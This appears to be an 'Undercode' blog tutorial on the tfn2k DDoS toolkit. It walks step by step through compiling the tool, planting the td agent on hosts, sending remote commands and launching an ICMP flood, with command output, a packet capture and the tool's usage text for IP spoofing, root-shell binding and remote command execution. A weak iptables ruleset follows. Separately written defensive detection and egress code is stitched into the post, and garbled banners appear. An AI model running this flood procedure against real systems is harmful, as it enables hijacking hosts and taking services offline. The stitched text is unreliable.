* up2date-gnome-3.1.23.2-1.i386.rpm - MD5 checksum: 733d0aca17c15af0b1fa709ba86337dc
https://rhn.redhat.com/download/1070772005/67cf7421b7b68c5f5ea5025300deb90a52f0d726/1352983/0/NULL/up2date-gnome/3.1.23.2-1/i386/up2date-gnome-3.1.23.2-1.i386.rpm
2) Check the MD5 checksums
[user@localhost user]$ md5sum <filename>
3) [user@localhost user]$ su
Password: (enter the root password)
4) [root@localhost user]# rpm -Fvh up2date-*
5) [root@localhost user]# up2date -p
If the connection is refused in step 5, it is because RH requires you to reactivate your account: go to https://rhn.redhat.com/renew/, enter your username and answer the questions to activate your account.
Other versions work the same way.
WRITTEN BY UNDERCODE
โ โ โ ๏ฝ๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
โ โ โ ๏ฝ๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
๐ฆ Network filtering-distributed denial of service (tfn2k) attack and iptables filtering test full by undercode :
instagram.com/UnderCodeTestingCompany
๐ฆ ๐๐ผ๐๐ ๐๐๐ธโ๐ :
Denial of service (DoS) can refer to anything that stops a service from being provided normally, for example software bugs or operator error. However, DoS caused by mistakes is rare; most of it is malicious. Denial of service has since evolved into distributed denial of service (DDoS), which uses many agents to concentrate on one target and is far more damaging.
> We all know that TCP/IP has become the framework protocol of the entire Internet; without it the Internet would not be as popular as it is now, or might not exist at all. But everything has two sides: TCP/IP benefits us all, and because of problems in the protocol itself it also becomes a tool for attacking us. We will use the TCP three-way handshake that establishes a connection to illustrate.
๐ฆ First, the TCP SYN flood
1) The client sends a TCP packet with the SYN (synchronize) flag to the server. The packet carries basic information such as the client port and the TCP sequence number.
2) After the server receives the SYN packet, it replies with a SYN-ACK packet to confirm.
3) After receiving the server's SYN-ACK, the client sends an ACK back to the server. Once the server receives it, the TCP connection is established and both sides can communicate (it feels like a traditional wedding: bow to heaven and earth, bow to the parents ... off to the bridal chamber ... haha).
> The problem lies in step 3. If the server never receives the client's ACK, it waits; this is called the half-open state, and it is kept for a certain period (the exact time varies by operating system). If the SYN requests exceed what the server can hold and the backlog queue fills, the server stops accepting new requests and connections from legitimate users are rejected. This kind of attack gets a big result for little effort, and it is extremely lethal.
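The half-open pile-up described above, seen from the server side, as an added example that is not part of the original post: it reads `ss -tan` style lines, counts SYN-RECV sockets per local port and per peer, and compares the total with the listen backlog. The socket table is constructed (the peer addresses reuse the spoofed sources that appear later in this post), and the column layout State / Recv-Q / Send-Q / Local / Peer is assumed.

```python
"""Added example (not part of the original post): detect the half-open
(SYN-RECV) pile-up the text describes from `ss -tan` output.  The socket
table below is constructed; assumed columns: State Recv-Q Send-Q Local Peer."""

from collections import Counter

SAMPLE_SS = """\
State     Recv-Q Send-Q Local Address:Port   Peer Address:Port
LISTEN    0      128    0.0.0.0:80           0.0.0.0:*
ESTAB     0      0      192.168.0.5:22       192.168.0.6:41022
SYN-RECV  0      0      192.168.0.5:80       23.43.171.0:1025
SYN-RECV  0      0      192.168.0.5:80       36.235.130.0:1026
SYN-RECV  0      0      192.168.0.5:80       23.43.171.0:1027
SYN-RECV  0      0      192.168.0.5:80       10.9.8.0:1028
"""


def half_open_by_port(ss_output):
    """{local_port: Counter(peer_ip -> SYN-RECV sockets)}: each entry is a
    connection the server holds in the half-open state, waiting for an ACK
    that, in a flood, never arrives."""
    table = {}
    for line in ss_output.splitlines():
        parts = line.split()
        if len(parts) < 5 or parts[0] != "SYN-RECV":
            continue
        port = parts[3].rsplit(":", 1)[1]
        peer = parts[4].rsplit(":", 1)[0]
        table.setdefault(port, Counter())[peer] += 1
    return table


def listen_backlog(ss_output, port):
    """Send-Q of the LISTEN row is the accept backlog for that port: the
    'buffer queue' that, once full, makes the kernel drop new SYNs."""
    for line in ss_output.splitlines():
        parts = line.split()
        if len(parts) >= 5 and parts[0] == "LISTEN" and parts[3].endswith(":" + port):
            return int(parts[2])
    return None


def syn_flood_verdict(ss_output, ratio=0.5, default_backlog=128):
    """Per port: half-open count, distinct peers, backlog, and whether the
    half-open count exceeds ratio * backlog.  Many peers with one or two
    sockets each is the spoofed-source signature; one peer with many is a
    single misbehaving client.  On Linux, net.ipv4.tcp_syncookies=1 lets the
    server answer SYNs without queueing any state, which defeats the fill-up."""
    verdicts = {}
    for port, peers in half_open_by_port(ss_output).items():
        backlog = listen_backlog(ss_output, port) or default_backlog
        total = sum(peers.values())
        verdicts[port] = {
            "half_open": total,
            "distinct_peers": len(peers),
            "backlog": backlog,
            "flooding": total > backlog * ratio,
        }
    return verdicts


if __name__ == "__main__":
    for port, v in syn_flood_verdict(SAMPLE_SS).items():
        print(port, v)
```

With the tiny sample the verdict stays False at the default ratio; on a live host pipe `ss -tan` output in and watch the distinct-peer count, which is what separates a spoofed flood from one broken client.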
๐ฆ Of course there are many other DoS methods, such as UDP flood, ICMP/Ping, ICMP/SMURF and so on; the principles are explained in detail at http://www.chinaitlab.com/www/special/ciwddos.asp, together with the commonly used attack software. When it comes to DoS attack software, the most representative is tfn2k (Tribe Flood Network 2000), written by the well-known German author mixter (home page http://mixter.void.ru/papers.html). It seems a tfn3k is being brewed; who knows how many people will lose sleep and appetite over that one ...
Two. Tfn2k attack principle
1) The tfn2k attack system.
tfn2k can be regarded as a masterpiece of DDoS tooling, and its feature list is astounding (my admiration flows like a river ...). Let's look at its architecture.
Master --- runs the tfn client, used to remotely control the agents, specify attack targets and change the attack method. (The sinister one.)
Agent --- a victim host on which the td process has been implanted and is running; it accepts commands from tfn and actually carries out the attack. Note that an attacker usually controls many agents to complete an attack, and the agents are mostly Unix / Linux systems. (Poor victim.)
Target host --- the host or network hit by the DDoS: Yahoo, Amazon, CNN, eBay and the like. (The biggest victim; depressing, like me.)
2) tfn2k features.
· The master sends commands to the agents over TCP, UDP or ICMP, or a random choice among them (the default is random). Attack methods include TCP/SYN, UDP, ICMP/PING, mixed attacks, TARGA3 and so on.
· Communication between master and agent is one-way: the master only sends commands to the agent, using random header information and even spoofed source addresses; the agent never sends anything back to the master.
· Commands are encrypted with CAST-256 using a password entered at compile time, and this password is the only authentication credential.
· Through the td process, the master can execute remote shell commands.
· The name of the td process can be changed at compile time, which makes it easier to hide.
· tfn can be compiled and run on Win32 and Linux systems.
...
The spoofing of source IP addresses is fairly basic, but compared with the old version of tfn it sends packets much more efficiently. In my own test, two agent machines paralysed my Red Hat Linux 9.0 system in less than 5 minutes.
Three. Tfn2k practical test
1) Test environment:
Software: Red Hat Linux 9.0
Hardware platform:
master: IP 192.168.0.6, PIV 2.4 / 256 * 2 / rtl8139
Ag1: IP 192.168.0.2, PIV 2.4 / 256 * / rtl8139
Ag2: IP 192.168.0.3, PIV 2.6 / 512 * 2 / 3c905
Aim (target): IP 192.168.0.5, PIV 2.66c / 512 * 2 / 3c905
switch: D-Link DES 1024R
1) Download tfn2k.tgz (because this software is unusual I don't give a download address; if you are interested, find it online).
2) Unpack: tar zxvf tfn2k.tgz
3) Modify the files
A. src/Makefile: if your system is Linux you don't need to change anything. If it is a Win32 system, comment out these lines:
# Linux / *BSD* / Others
CC = gcc
CFLAGS = -Wall -O3
CLIBS =
and uncomment these:
# Win32 (cygwin)
#CC = gcc
#CFLAGS = -Wall -DWINDOZE -O2
#CLIBS =
Because my test system is Red Hat Linux 9.0, I made no changes.
B. src/config.h is usable by default. If you are interested, you can adjust it according to the comments in it.
C. src/ip.h: make a small change here, otherwise you get compilation errors about duplicate definitions.
/* struct in_addr
{
unsigned long int s_addr;
}; */
Note: I put it between "/* */", i.e. commented it out :)
D) Change the compiler:
The compiler tfn2k supports is egcs-1.1.2-30, while Red Hat Linux 9.0 ships gcc-3.2.2-5, so tfn2k cannot be compiled unless you replace gcc. Note that after the change, software that depends on gcc 3.2.2 will no longer compile, so be careful.
The method is very simple: find a Red Hat Linux 6.2 installation disc and copy egcs-1.1.2-30.rpm and cpp-1.1.2-30.rpm to ~/
cd /mnt/cdrom/RedHat/RPMS
cp egcs-1.1.2-30* cpp-1.1.2-30* ~/
Install cpp: rpm -Uvh --nodeps --oldpackage cpp-1.1.2-30.i386.rpm
Install egcs: rpm -Uvh egcs-1.1.2-30.i386.rpm
(if you get errors, use --nodeps, --oldpackage, --ignoreos and similar options to push past them)
4) Compile tfn2k
cd tfn2k/src
make
First a disclaimer is shown, which you must accept; then you are prompted for an 8-32 character password. As mentioned earlier, this is the only authentication credential and it is compiled into the td process, so be sure to remember it.
After compiling, td and tfn are produced. This is the famous tfn2k: td is the daemon installed on the agents, and tfn is the control program.
5) Install td.
Upload td to my two agents, ag1 (192.168.0.2) and ag2 (192.168.0.3). Because I am only testing, I use a legitimate root login to upload and run the td process. If you really wanted to find and install agents you would have to pray to God, because no administrator will say "come on baby, I'll give you root, install td and make me an agent".
[root@test /] ftp 192.168.0.2
Connected to 192.168.0.2.
530 Please login with USER and PASS.
530 Please login with USER and PASS.
Name (192.168.0.2:root): wjpfjy
331 Please specify the password.
Password:
230 Login successful. Have fun.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> put td (upload td)
local: td remote: td
227 Entering Passive Mode (192,168,0,3,198,225)
553 Could not create file.
ftp> by (quit ftp)
221 Goodbye.
[root@test /] ssh 192.168.0.2
// Log in to ag1 to run td. Note that I use the root account so that I have sufficient permissions.
root@192.168.0.2's password:
Last login: Tue Feb 24 06:51:13 2004
[root@ag1 /] find / -name td -print
// Find the td file just uploaded.
[root@ag1 wjpfjy /] chmod a+x td
// Make it executable.
[root@ag1 wjpfjy /] ./td
// Run td; now you have an agent, and it only takes commands from you :(
Install and run the tfn2k process td on ag2 (192.168.0.3) the same way.
6) The attack begins (the tragic memory is being replayed ...)
Return to the master (192.168.0.6) and prepare for the exercise ...
[root@master root]# touch host.txt
// Create an agent list file (if you are bored enough you may end up with a lot of agents ("broilers"); write them down or you will forget them.)
[root@master root] echo "192.168.0.2" > host.txt   Add ag1, where td is running, to host.txt.
[root@master root] echo "192.168.0.3" >> host.txt   Add ag2 to host.txt.
First let's test the link.
[root@master root] ./tfn -f host.txt -c 10 -i "mkdir wjpfjy"   Contact the agents in host.txt and have them run mkdir wjpfjy to create a directory.
Protocol: random
Source IP: random
Client input: list
Command: execute remote command
Password verification:
// Here you are prompted for the password entered at compile time. If you get it wrong, you cannot communicate with the td process.
Sending out packets: ..
Go to ag1 and ag2 and check whether a directory named wjpfjy was created. Usually it is in the same directory as td; if unsure, use find / -name wjpfjy -print.
[root@master root] ./tfn -f host.txt -c 6 -i 192.168.0.5   starts an ICMP/PING attack on aim ... (poor P4: in under 5 minutes it was as slow as a 386), but before game over it still managed to record the attack traffic, which counts as a keepsake. This is the packet capture from tcpdump.
[root@aim root]# tcpdump -r pack.atta -c 4 -xX
08:03:36.524907 23.43.171.0 > 192.168.0.5: icmp: echo request [ttl 0]
0x0000   4500 005c 659d 0000 0001 d22e 172b ab00        E..\e.......+...
0x0010   c0a8 0002 0800 f7ff 0000 0000 0000 0000        ................
0x0020   0000 0000 0000 0000 0000 0000 0000 0000        ................
0x0030   0000 0000 0000 0000 0000 0000 0000 0000        ................
0x0040   0000 0000 0000 0000 0000 0000 0000 0000        ................
0x0050   0000                                           ..
08:03:36.524933 192.168.0.5 > 23.43.171.0: icmp: echo reply
0x0000   4500 005c a5d5 0000 4001 51f6 c0a8 0002        E..\....@.Q.....
0x0010   172b ab00 0000 ffff 0000 0000 0000 0000        .+..............
0x0020   0000 0000 0000 0000 0000 0000 0000 0000        ................
0x0030   0000 0000 0000 0000 0000 0000 0000 0000        ................
0x0040   0000 0000 0000 0000 0000 0000 0000 0000        ................
0x0050   0000                                           ..
08:03:36.524944 36.235.130.0 > 192.168.0.5: icmp: echo request [ttl 0]
0x0000   4500 005c 659d 0000 0001 ed6e 24eb 8200        E..\e......n$...
0x0010   c0a8 0002 0800 f7ff 0000 0000 0000 0000        ................
0x0020   0000 0000 0000 0000 0000 0000 0000 0000        ................
0x0030   0000 0000 0000 0000 0000 0000 0000 0000        ................
0x0040   0000 0000 0000 0000 0000 0000 0000 0000        ................
0x0050   0000                                           ..
08:03:36.524984 192.168.0.5 > 36.235.130.0: icmp: echo reply
0x0000   4500 005c 551c 0000 4001 bdef c0a8 0002        E..\U...@.......
0x0010   24eb 8200 0000 ffff 0000 0000 0000 0000        $...............
0x0020   0000 0000 0000 0000 0000 0000 0000 0000        ................
0x0030   0000 0000 0000 0000 0000 0000 0000 0000        ................
0x0040   0000 0000 0000 0000 0000 0000 0000 0000        ................

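Reading the capture above by hand, the marks of TFN traffic are all visible in the hex: both echo requests carry the same IP identification 0x659d, a TTL of 0, a randomly spoofed source whose host byte is 0 (23.43.171.0, 36.235.130.0), and an ICMP echo whose id and sequence are both 0 (hence the fixed checksum 0xf7ff). The victim dutifully answers every spoofed address, so the replies become backscatter towards whoever owns those addresses and double the traffic on its link. (The hex also shows the destination as c0a8 0002, i.e. 192.168.0.2, while the summary lines say 192.168.0.5; the summary lines were evidently edited after the fact.) The following is an added example, not code from the original tutorial: it pulls those fields out of the first 28 bytes of the two requests and of one reply (re-entered here as constructed strings from the dump) and flags the marks. The offsets are the standard IPv4/ICMP header layout; the names field, addr, tfn_marks and same_ipid are my own.

```shell
#!/bin/sh
# Added example: inspect IPv4/ICMP headers (hex as printed by tcpdump -x) and
# flag the marks of a TFN ICMP flood: TTL 0, spoofed source with a .0 host byte,
# an ICMP echo request with id/seq both 0, and a constant IP identification.

# Constructed input: first 28 bytes (IP + ICMP header) of the two echo requests
# and of the first echo reply from the capture on the page.
PKT1='4500005c659d00000001d22e172bab00c0a800020800f7ff00000000'
PKT2='4500005c659d00000001ed6e24eb8200c0a800020800f7ff00000000'
REPLY1='4500005ca5d50000400151f6c0a80002172bab000000ffff00000000'

# field HEX BYTE_OFFSET BYTE_LEN -> decimal value of the header bytes at that offset
field() {
    printf '%d' "0x$(printf '%s' "$1" | cut -c "$(( $2 * 2 + 1 ))-$(( ($2 + $3) * 2 ))")"
}

# addr HEX BYTE_OFFSET -> dotted quad of the four bytes at that offset
addr() {
    printf '%d.%d.%d.%d' "$(field "$1" "$2" 1)" "$(field "$1" $(( $2 + 1 )) 1)" \
        "$(field "$1" $(( $2 + 2 )) 1)" "$(field "$1" $(( $2 + 3 )) 1)"
}

# tfn_marks HEX -> prints each suspicious mark on its own line; exit 0 if any found
# (offsets: 8 = TTL, 9 = protocol, 15 = last source byte, 20 = ICMP type, 24-27 = id+seq)
tfn_marks() {
    hex=$1; n=0
    [ "$(field "$hex" 9 1)" -eq 1 ] || return 1            # not ICMP: nothing to say
    if [ "$(field "$hex" 8 1)" -eq 0 ]; then echo ttl0; n=$((n + 1)); fi
    if [ "$(field "$hex" 15 1)" -eq 0 ]; then echo src-host-byte-0; n=$((n + 1)); fi
    if [ "$(field "$hex" 20 1)" -eq 8 ] && [ "$(field "$hex" 24 4)" -eq 0 ]; then
        echo echo-id-seq-0; n=$((n + 1))
    fi
    [ "$n" -gt 0 ]
}

# same_ipid HEX1 HEX2 -> exit 0 if both packets carry the same IP identification
# (a real host increments it; the capture shows 0x659d on both requests)
same_ipid() { [ "$(field "$1" 4 2)" -eq "$(field "$2" 4 2)" ]; }

# Walk the two requests and print what was found for each.
for p in "$PKT1" "$PKT2"; do
    printf '%s -> %s: ' "$(addr "$p" 12)" "$(addr "$p" 16)"
    tfn_marks "$p" | tr '\n' ' '
    echo
done
```

Fed a stream of tcpdump -x hex lines, the same functions apply per packet. The telling signal is not any single mark but several of them together at a high packet rate: a legitimate ping carries a non-zero id and sequence and a TTL well above 0, and its IP identification changes from packet to packet.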
    [root@master root]# ./tfn -f host.txt -c 0     Stop the attack
        Protocol      : random
        Source IP     : random
        Client input  : list
        Command       : stop flooding
        Password verification:
        Sending out packets: ...
    Of course there are other attack methods; you select the attack method with -c X.
    [root@master root]# ./tfn
    usage: ./tfn
[-P protocol]       Protocol for server communication. Can be ICMP, UDP or TCP.
                    Uses a random protocol as default
[-D n]              Send out n bogus requests for each real one to decoy targets
[-S host/ip]        Specify your source IP. Randomly spoofed by default, you need
                    to use your real IP if you are behind spoof-filtering routers
[-f hostlist]       Filename containing a list of hosts with TFN servers to contact
[-h hostname]       To contact only a single host running a TFN server
[-i target string]  Contains options/targets separated by '@', see below
[-p port]           A TCP destination port can be specified for SYN floods
<-c command ID>     0 - Halt all current floods on server(s) immediately
                    1 - Change IP antispoof-level (evade rfc2267 filtering)
                        usage: -i 0 (fully spoofed) to -i 3 (/24 host bytes spoofed)
                    2 - Change Packet size, usage: -i <packet size in bytes>
                    3 - Bind root shell to a port, usage: -i <remote port>
                    4 - UDP flood, usage: -i victim@victim2@victim3@...
                    5 - TCP/SYN flood, usage: -i victim@... [-p destination port]
                    6 - ICMP/PING flood, usage: -i victim@...
                    7 - ICMP/SMURF flood, usage: -i victim@broadcast@broadcast2@...
                    8 - MIX flood (UDP/TCP/ICMP interchanged), usage: -i victim@...
                    9 - TARGA3 flood (IP stack penetration), usage: -i victim@...
                   10 - Blindly execute remote shell command, usage -i command
4) Defensive approach.
    As every DDoS article on the internet says, DDoS is hard to defend against. I tried a firewall that filters out all ICMP packets to protect my host, but what I got was a host that crashed later anyway. Dropping packets at the host does not help once the inbound link itself is saturated; the filtering has to happen upstream, at the border router or at the ISP. Hey ~, don't expect me to be able to guard against DDoS; if I could, I wouldn't need to lose sleep :(
    Still the old saying: what we can do is try our best not to let our own hosts become agents for other people's attacks, and strictly restrict the traffic leaving our own network, so that at least we do no harm to others. If everyone does this our network environment gets safer, and I at least get to sleep peacefully for a few days.
    Attached is part of my firewall. It is mainly aimed at ICMP/PING, but it is not very useful :(
# Default policy: drop anything that is not explicitly accepted.
/sbin/iptables -P INPUT DROP
/sbin/iptables -A INPUT -i lo -p all -j ACCEPT
# All ICMP is accepted from the LAN side (eth1); echo requests arriving on any other interface are dropped here.
/sbin/iptables -A INPUT -i eth1 -p icmp -j ACCEPT
/sbin/iptables -A INPUT -p icmp --icmp-type 8 -j DROP
# Anti-spoofing on the Internet side (eth0): loopback, LAN and private ranges must not arrive there.
# Note: -s 127.0.0.2 matches that single address only; 127.0.0.0/8 is the usual loopback rule.
# $LAN_NET is set earlier in the script; only part of it is shown here.
/sbin/iptables -A INPUT -s 127.0.0.2 -i lo -j ACCEPT
/sbin/iptables -A INPUT -s 127.0.0.2 -i eth0 -j DROP
/sbin/iptables -A INPUT -s $LAN_NET/24 -i eth0 -j DROP
/sbin/iptables -A INPUT -s 172.16.0.0/12 -i eth0 -j DROP
/sbin/iptables -A INPUT -i eth0 -s 10.0.0.0/8 -j DROP
# Rate limit on eth0: a burst of 5, then 1 packet/sec of any protocol is accepted;
# everything above that rate falls through to the rules below.
/sbin/iptables -A INPUT -i eth0 -m limit --limit 1/sec --limit-burst 5 -j ACCEPT
/sbin/iptables -A INPUT -i eth0 -p udp -m state --state NEW -j REJECT
# Services offered (SSH and HTTP from anywhere, DNS from the LAN only).
/sbin/iptables -A INPUT -p tcp --dport 22 -j ACCEPT
/sbin/iptables -A INPUT -p tcp --dport 80 -j ACCEPT
/sbin/iptables -A INPUT -p tcp -i eth1 --dport 53 -j ACCEPT
/sbin/iptables -A INPUT -p udp -i eth1 --dport 53 -j ACCEPT
# Replies to connections this host initiated (unprivileged destination ports).
/sbin/iptables -A INPUT -p tcp -i eth0 -m state --state ESTABLISHED,RELATED -m tcp --dport 1024: -j ACCEPT
/sbin/iptables -A INPUT -p udp -i eth0 -m state --state ESTABLISHED,RELATED -m udp --dport 1024: -j ACCEPT
# Log and drop echo requests on eth0. As written these two rules are never reached: the
# "--icmp-type 8 -j DROP" rule above has already consumed every echo request that did not
# come in on eth1. If the logging is wanted, move the LOG rule above that DROP and give it
# "-m limit", otherwise a ping flood like the one captured above writes one syslog line per packet.
/sbin/iptables -A INPUT -p icmp --icmp-type echo-request -j LOG --log-level 2
/sbin/iptables -A INPUT -i eth0 -p icmp --icmp-type echo-request -j DROP
# Log NetBIOS/RPC probes.
/sbin/iptables -A INPUT -p tcp -m multiport --destination-port 135,137,138,139 -j LOG
/sbin/iptables -A INPUT -p udp -m multiport --destination-port 135,137,138,139 -j LOG
/sbin/iptables -A INPUT -i eth0 -p tcp --dport 2000 -j ACCEPT
/sbin/iptables -A INPUT -i eth0 -p tcp --dport 2001 -j ACCEPT
/sbin/iptables -A INPUT -p tcp -i eth1 -m state --state ESTABLISHED,RELATED -m tcp --dport 1024: -j ACCEPT
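Every rule in the firewall above is on the INPUT chain: it protects this host from floods but does nothing about a td agent on this host sending floods out, which is the "do not become someone else's agent" goal stated a few lines earlier. tfn spoofs the source address unless told otherwise (its -S option and the antispoof-level command exist precisely to cope with RFC 2267 filtering), so an egress rule that drops any outbound packet not carrying this host's own address, the host-level form of BCP 38, removes most of what makes a compromised host useful as an agent, and a rate limit on outbound echo requests catches the non-spoofed case. The following is an added example, not the author's ruleset: the interface name eth0, the address 192.0.2.10 and the function names are assumed, and the "! -s" negation is the current iptables syntax (older releases wrote "-s ! addr").

```shell
#!/bin/sh
# Added example: egress (OUTPUT-chain) rules that stop this host from emitting
# spoofed or excessive ICMP traffic, the half the INPUT-only firewall above lacks.
# EXT_IF and MY_IP are assumed values; override them from the environment.

EXT_IF=${EXT_IF:-eth0}        # assumed: Internet-facing interface
MY_IP=${MY_IP:-192.0.2.10}    # assumed: this host's public address (documentation range)

# Print the OUTPUT-chain rules, one per line, so they can be reviewed or diffed
# before being applied. Each line is the argument list for one iptables call.
egress_rules() {
    cat <<EOF
-A OUTPUT -o $EXT_IF ! -s $MY_IP -m limit --limit 5/min -j LOG --log-prefix "SPOOFED-EGRESS: "
-A OUTPUT -o $EXT_IF ! -s $MY_IP -j DROP
-A OUTPUT -o $EXT_IF -p icmp --icmp-type echo-request -m limit --limit 2/sec --limit-burst 10 -j ACCEPT
-A OUTPUT -o $EXT_IF -p icmp --icmp-type echo-request -j DROP
EOF
}

# Apply the rules (requires root). Loopback and the LAN interface are left alone;
# only traffic leaving through the Internet-facing interface is policed.
apply_egress_rules() {
    egress_rules | while IFS= read -r rule; do
        eval "/sbin/iptables $rule"
    done
    # Kernel-side reverse-path check on incoming traffic: the ingress half of the
    # same idea (drops packets whose source would not be routed back via that interface).
    sysctl -w net.ipv4.conf.all.rp_filter=1
}

# Run as:  EXT_IF=eth0 MY_IP=203.0.113.4 sh egress.sh apply
# Without "apply" the rules are only printed.
if [ "${1:-}" = apply ]; then
    apply_egress_rules
else
    egress_rules
fi
```

The LOG rule is rate limited on purpose: a td agent flooding at full speed would otherwise fill syslog with the very evidence you want to keep. On a box with several public addresses, replace the single "! -s" test with a "-s" ACCEPT per address followed by an unconditional DROP.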
WRITTEN BY UNDERCODE
โ โ โ ๏ฝ๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
This full DDoS tutorial is powered by deepweb.